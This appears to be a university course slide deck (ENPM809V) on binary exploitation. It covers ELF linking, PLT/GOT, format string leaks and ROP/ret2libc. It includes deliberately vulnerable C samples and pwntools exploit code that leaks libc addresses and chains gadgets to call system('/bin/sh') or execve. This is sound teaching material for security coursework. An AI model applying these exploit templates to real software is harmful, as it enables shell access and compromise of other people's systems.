ENPM809V
Exploitation Review and ROP Chain
What We Work On
- ELF & Linking
- Library And System Calls
- Format String Exploit Review
- ROP Chain and ret2libc
ELF & Linking
ELF Header
#define EI_NIDENT 16
typedef struct {
unsigned char e_ident[EI_NIDENT];
Elf32_Half e_type;
Elf32_Half e_machine;
Elf32_Word e_version;
Elf32_Addr e_entry;
Elf32_Off e_phoff;
Elf32_Off e_shoff;
Elf32_Word e_flags;
Elf32_Half e_ehsize;
Elf32_Half e_phentsize;
Elf32_Half e_phnum;
Elf32_Half e_shentsize;
Elf32_Half e_shnum;
Elf32_Half e_shtrndx;
} Elf32_Ehdr;
$ readelf -h a.out ###Output modified slightly
Magic: 7f 45 4c 46 \x7fELF
Class: ELF32
Data: little endian
Version: 1 (current)
OS/ABI: UNIX - System V
ABI Version: 0
Type: EXEC
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048430
Start of program headers: 52
Start of section headers: 8588
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 9
Size of section headers: 40 (bytes)
Number of section headers: 35
Section header string table index: 34
e_ -- elf
ph -- program header
sh -- section header
off -- offset
ent -- entry
e_shentsize ?
e_shnum ?
e_phentsize ?
e_shtrndx ?*
Section Header Entry Size
Section Header Number (of entries)
Program Header Entry Size
Section Header String Table Index
### modified output
[Nr] Name Type
[ 0] NULL
[ 1] .interp PROGBITS
[ 2] .note.ABI-tag NOTE
[ 3] .note.gnu.build-i NOTE
[ 4] .gnu.hash GNU_HASH
[ 5] .dynsym DYNSYM
[ 6] .dynstr STRTAB
[ 7] .gnu.version VERSYM
[ 8] .gnu.version_r VERNEED
[ 9] .rela.dyn RELA
[10] .rela.plt RELA
[11] .init PROGBITS
[12] .plt PROGBITS
[13] .plt.got PROGBITS
[14] .text PROGBITS
[15] .fini PROGBITS
[16] .rodata PROGBITS
[17] .eh_frame_hdr PROGBITS
[18] .eh_frame PROGBITS
[19] .init_array INIT_ARRAY
[20] .fini_array FINI_ARRAY
[21] .data.rel.ro PROGBITS
[22] .dynamic DYNAMIC
[23] .got PROGBITS
[24] .data PROGBITS
[25] .bss NOBITS
[26] .gnu_debuglink PROGBITS
[27] .shstrtab STRTAB
Section Header
- A defined header that gives information regarding the section the binary
- Usually the section is unstructured
Examples: .text, .got, .data
Run the command readelf -S /bin/bash
Program Header
- Indicates how segments required for execution are to be loaded into virtual memory.
- There exists a Sections to Segment mapping that specifies which sections are part of which segments.
Binary Layout
- Does it matter where the Program and Section headers are in the binary?
- Where must the ELF Header always exist?
- Are all Section or Program headers needed?
How do multiple source files become a single executable?
ELF file formats:
- Executable file
- Shared Object file
- Relocatable file
- and some others
ELF Header specifies the file format
+ Executable: specifies how to load the program into a process image (remember exec and forking?)
+ Relocatable: specifies how to include it's own code and data into an Executable or Shared object. Object files waiting to be included.
+ Shared Object: Dynamic library that links with an executable on load by a linker. Think printf, Libc, stdio.h
How do multiple source files become a single executable?
ELF file formats:
- Executable file
- Shared Object file
- Relocatable file
Linker links objects with shared libraries.
What does the whole pipeline look like then?
1. GCC compiles into ELF Relocatables
2. Static linker links Relocatables and attaches necessary information for Shared Object linking into an Executable
3. Loader execs the Executable, then the dynamic linker actually links to the Shared Objects for code execution.
Library and System Calls
What Are They
- Library Calls: calls to functions that are linked into a binary
- System Calls: They are a processes way for asking permission to do something with a resource (at the kernel level)
- Not standard between distributions and architectures
How do Library Calls Work
- At compile time, link in the shared object
- At run time, the linker sets up the Global Offset Table in Memory
- Function is called: use an offset within the GOT to call the PLT
- The Procedure Lookup Table (PLT) facilitates what is called lazy binding in programs. Binding is synonymous with the fix-up process described above for variables located in the GOT. When an entry has been "fixed-up" it is said to be "bound" to its real address.
- Jump to the shared object from the linked function
Reference: https://bottomupcs.sourceforge.net/csbu/x3882.htm
How do System Calls Work?
- User makes calls a function that makes a system call
- e.g. open, write, read, etc.
- Can call syscall() function directly
- The Libc function makes a request to the kernel
- The kernel looks up the system call requested
- The kernel executes the system call, which then performs the desired action
- return all data back to the user
- Read man 2 syscall
How do System Calls Work?
How do System Calls Work?
I saw you said libc... what is that?
The term "libc" is commonly used as a shorthand for the "standard C library", a library of standard functions that can be used by all C programs (and sometimes by programs in other languages).
-wikipedia
What is happening when we use printf in our binaries?
I saw you said libc... what is that?
What is happening when we use printf in our binaries?
Ensure that we have the proper #include to reference printf in our code
- We lookup printf in the PLT. If it is not found in the PLT, we find it in
the GOT
- The GOT has the absolute memory address of the code. The PLT
delays the cost of looking it up until necessary.
- We do this to save memory.
How does text make it to the screen?
I saw you said libc... what is that?
How does text make it to the screen?
printf, malloc, read, write, etc. are all wrappers for
system calls.
System calls are the process' way of asking for
permission to do something with a resource.
Format String Vulnerabilities
What is it?
- When a software developer improperly filters content via format strings.
- Perfect example is
printf(user_input);
- Perfect example is
- What can this lead to?
- Arbitrary Code Execution
- Leakage of information
Example
#include <stdio.h>
#include <unistd.h>
int main() {
int secret_num = 0x8badf00d;
char name[64] = {0};
read(0, name, 64);
printf("Hello ");
printf(name);
printf("! You'll never get my secret!\n");
return 0;
}
How is it vulnerable?
#include <stdio.h>
#include <unistd.h>
int main() {
int secret_num = 0x8badf00d;
char name[64] = {0};
read(0, name, 64);
printf("Hello ");
printf(name);
printf("! You'll never get my secret!\n");
return 0;
}
$ ./fmt_string
Enter Input: %7$llx
Hello 8badf00d3ea43eef
! You'll never get my secret!
Useful Format Strings
- %c - read character from the stack
- %d, %i, %x - read an integer (4 bytes) from the stack (%x is in hex)
- %s - de-reference a pointer and read until null byte is hit
- %hx - leaks two bytes
- %hhx - Leaks one byte
- %lx - leaks 8 bytes
- %n$x - leaks 4 bytes at the nth parameter
- Example: %7$x - prints the 7th parameter on the stack
Executing Data
- For executing data, we need to utilize %n and it's varients
- %n will dereference a pointer - write to that address the number of bytes written to it so far.
- Why is this bad?
Executing Shellcode
Executing Shellcode Via Pwntools
p = process('./vulnerable')
# Function called in order to send a payload
def send_payload(payload):
log.info("payload = %s" % repr(payload))
p.sendline(payload)
return p.recv()
# Create a FmtStr object and give to him the function
format_string = FmtStr(execute_fmt=send_payload)
format_string.write(0x0, 0x1337babe) # write 0x1337babe at 0x0
format_string.write(0x1337babe, 0x0) # write 0x0 at 0x1337babe
format_string.execute_writes()
Classwork
- What can be found from the format string vulnerability?
- What part of memory can we leak
- See if you can execute shellcode
- Spend 10-20 minutes on it
Buffer Overflow and ROP
Classic Buffer Overflow
Classic Buffer Overflow
Classic Buffer Overflow
int some_function()
{
char buff[128];
gets(buff);
printf("%s\n", buffer);
return 0;
}
Classic Buffer Overflow
int some_function()
{
char buff[128];
gets(buff);
printf("%s\n", buffer);
return 0;
}
Bypassing Mitigations
- RET2LIBC
- Address Leakage
ROP Chain
- Defined as return oriented programming
- A way of bypassing non-executable stack protection.
- Reuses code in shared objects or the program itself
- Classic example is RET2LIBC
ROP Chain - How it Works
- Overflow the buffer to jump to various gadgets
- Gadgets could be some things like
pop rdi; ret
- Gadgets could be some things like
- Return to an address that you control (the next gadget)
- Chain as many of these gadgets together to create desired effect
- Example: create a ROP chain that executes /bin/sh via syscall
What this looks like
void rop1()
{
printf("1\n");
}
void rop2()
{
printf("2\n");
}
void rop3()
{
printf("3\n");
}
void vuln(char *str)
{
char buffer[100];
strcpy(buffer, str);
}
void main(int argc, char** argv)
{
vuln(argv[1]);
}
payload = b"\x90"*108 + rop1_addr + rop2_addr + rop3_addr
output:
1
2
3
Important Gadgets
- Find resources on the stack - (such as finding /bin/sh or /bin/cat)
- Fixup Gadgets - Menat to unbreak/stack fix up
- Examples are pop r12; pop rdi; pop rsi; ret
- add rsp, 0x40; ret
- Storing values into registers
- pop rdx; ret
ROP Chain
[*] rop2 Chain dump:
0x0000: 0x7f34ab6b15 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f349c1ccd pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f34b51d4e [arg0] rdi = 546345131342
0x0038: 0x7f34a80a94 execve
How Did we Get that ROP Chain?
- Need to understand what parameters need to be set
- How to set them
- Find the gadgets
- Construct the ROP chain
[*] rop2 Chain dump:
0x0000: 0x7f34ab6b15 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f349c1ccd pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f34b51d4e [arg0] rdi = 546345131342
0x0038: 0x7f34a80a94 execve
Finding Gadgets
ROPGadget
https://github.com/JonathanSalwan/ROPgadget
Ropper
https://github.com/sashs/Ropper
Open homework or classwork. Find some gadgets for 10 minutes
Pwntools
[*] rop2 Chain dump:
0x0000: 0x7f34ab6b15 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f349c1ccd pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f34b51d4e [arg0] rdi = 546345131342
0x0038: 0x7f34a80a94 execve
#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
Common Gadgets
- ret - at the end of every function
- leave; ret - at the end of many functions
- pop REG; ret - restoring variables saved registers
- mov rax, REG; ret - setting the return value (always in RAX)
Although these are common, you don't have to use just use these. Can search for any combination of instructions.
Other Important Concepts
#Construct a ROP to leak libc
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
Procedure Linking Table
- What is actually called when you call a binary that's dynamically linked
- If GOT entry for the function is resolved, jumps immediately there
- If GOT entry is not resolved, then it first resolves the GOT entry, then jumps to it
Global Offset Table
- A massive table of addresses containing locations in memory of libc functions
- This is the actual function call
- To summarize PLT redirects code execution to the location at GOT.
- If the address is empty, it coordinates with ld.so (dynamic linker/loader) to get function address and store it in GOT.
Why is this important?
Needed for ret2libc! (homework)
Ret2libc
ret2libc
- Controlling the binary to return to code into the system's libc
- Helps us to bypass NX or DEP
Ret2libc - system("/bin/sh")
- Get base address of libc
- If ASLR is enabled, we need to leak this
- Add padding to ret
- Find the address of
pop rdi; ret
- Find the address the "/bin/sh" string
- Find the address of "system"
- Say where you want to return to
How can we find these gadgets?
You do that right now! Use ropper/ROPGadget to find them.
What does this look like?
# pwntools example
rop = ROP([binary, libc])
binsh = next(libc.search(b"/bin/sh"))
rop.execve(binsh, 0, 0)
rop.dump()
'''output
[*] rop Chain dump:
0x0000: 0x7f69246a85 pop rdx; pop r12; ret
0x0008: 0x0 [arg2] rdx = 0
0x0010: b'eaaafaaa' <pad r12>
0x0018: 0x7f69153673 pop rsi; ret
0x0020: 0x0 [arg1] rsi = 0
0x0028: 0x4013a3 pop rdi; ret
0x0030: 0x7f692e1c11 [arg0] rdi = 547225476113
0x0038: 0x7f692107c4 execve
'''
payload = padding + rop.chain()
### without pwntools gadget finder
# These addresses you need to figure
# out from within the binary
libc_base = 0x12345678
POP_RDI = pop_rdi_addr
system = libc_base + offset_system_addr
binsh = libc_base + offset_binsh_addr
payload = padding
payload += p64(POP_RDI)
payload += p64(binsh)
payload += p64(system)
payload += p64(whatever_you_want_to_ret_to)
What if we need libc base address?
int vuln()
{
char buffer[128];
gets(buffer);
printf("%s\n", buffer);
}
- Utilize the PLT and GOT to resolve a function
- Subtract the offset of that function from libc from the address we acquired.
We need a place to receive input
payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beggining_of_vuln
# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()
'''
[*] Rop1 chain dump:
0x0000: 0x4013a3 pop rdi; ret
0x0008: 0x404028 [arg0] rdi = got.puts
0x0010: 0x4010c4 puts
0x0018: 0x401316 0x401316()
'''
What if we need libc base address?
int vuln()
{
char buffer[128];
gets(buffer);
printf("%s\n", buffer);
}
- Utilize the PLT and GOT to resolve a function
- Subtract the offset of that function from libc from the address we acquired.
We need a place to receive input
payload = padding
payload += addr_of_poprdi_ret
payload += addr_of_func_got
payload += addr_of_func_plt
payload += ret_to_beggining_of_vuln
# pwntools automated
rop = ROP(exe)
rop.puts(exe.got['puts'])
rop.call(exe.symbols['main'])
rop.dump()
'''
[*] Rop1 chain dump:
0x0000: 0x4013a3 pop rdi; ret
0x0008: 0x404028 [arg0] rdi = got.puts
0x0010: 0x4010c4 puts
0x0018: 0x401316 0x401316()
'''
libc = ELF("/path/to/libc.so.6")
io.sendline(payload)
addr = io.recvline()
#parse the address received
addr = addr.strip()
leak = u64(addr.ljust(8, b"\x00"))
libc.address = leak-libc.symbols["puts"]
log.info("libc base address = 0x{}".format(libc.address))
Putting it all together
- Get the libc base address
- Leak it somehow
- Format string or printing it out via another ROP Chain
- Find the gadgets to execute the functions you want (from libc and the binary)
- Construct the ROP chain to execute what you'd like
- Execute!
Work on the homework!
ENPM809V - Explotitation Review and ROP Chain
By Ragnar Security
ENPM809V - Explotitation Review and ROP Chain
- 162